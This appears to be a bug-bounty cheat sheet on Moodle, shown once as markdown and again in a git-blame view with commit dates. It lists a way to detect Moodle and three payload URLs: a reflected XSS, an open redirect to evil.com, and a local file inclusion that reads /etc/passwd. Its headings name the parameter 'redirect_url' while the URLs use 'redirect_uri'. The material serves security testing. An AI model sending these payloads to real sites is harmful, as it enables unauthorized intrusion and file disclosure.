AllAboutBugBounty/Technologies/Moodle.md

# Moodle Common Bugs

## Introduction
What would you do if you came across a website that uses Moodle?

## How to Detect
If you visit `https://target.com` and see the source code, you will see `<meta name="keywords" content="moodle,`

1. Reflected XSS in /mod/lti/auth.php via "redirect_url" parameter
```
https://target.com/mod/lti/auth.php?redirect_uri=javascript:alert(1)
```

2. Open redirect in /mod/lti/auth.php in "redirect_url" parameter

```
https://target.com/mod/lti/auth.php?redirect_uri=https://evil.com
```

3. LFI /filter/jmol/js/jsmol/php/jsmol.php in "query" parameter

```
https://target.com/filter/jmol/js/jsmol/php/jsmol.php?call=getRawDataFromDatabase&query=file:///etc/passwd
```
Adding some 'technology' information 2022-06-18 13:26:55 +00:00			`# Moodle Common Bugs`

			`## Introduction`
			`What would you do if you came across a website that uses Moodle?`

			`## How to Detect`
			If you visit `https://target.com` and see the source code, you will see `<meta name="keywords" content="moodle,`
Major Update, adding some tips 2021-07-21 15:38:57 +00:00
Update structure each readme 2022-06-15 10:38:42 +00:00			`1. Reflected XSS in /mod/lti/auth.php via "redirect_url" parameter`
Major Update, adding some tips 2021-07-21 15:38:57 +00:00			```
			`https://target.com/mod/lti/auth.php?redirect_uri=javascript:alert(1)`
			```

Update structure each readme 2022-06-15 10:38:42 +00:00			`2. Open redirect in /mod/lti/auth.php in "redirect_url" parameter`
Major Update, adding some tips 2021-07-21 15:38:57 +00:00
			```
Adding some 'technology' information 2022-06-18 13:26:55 +00:00			`https://target.com/mod/lti/auth.php?redirect_uri=https://evil.com`
			```

			`3. LFI /filter/jmol/js/jsmol/php/jsmol.php in "query" parameter`

			```
			`https://target.com/filter/jmol/js/jsmol/php/jsmol.php?call=getRawDataFromDatabase&query=file:///etc/passwd`
Major Update, adding some tips 2021-07-21 15:38:57 +00:00			```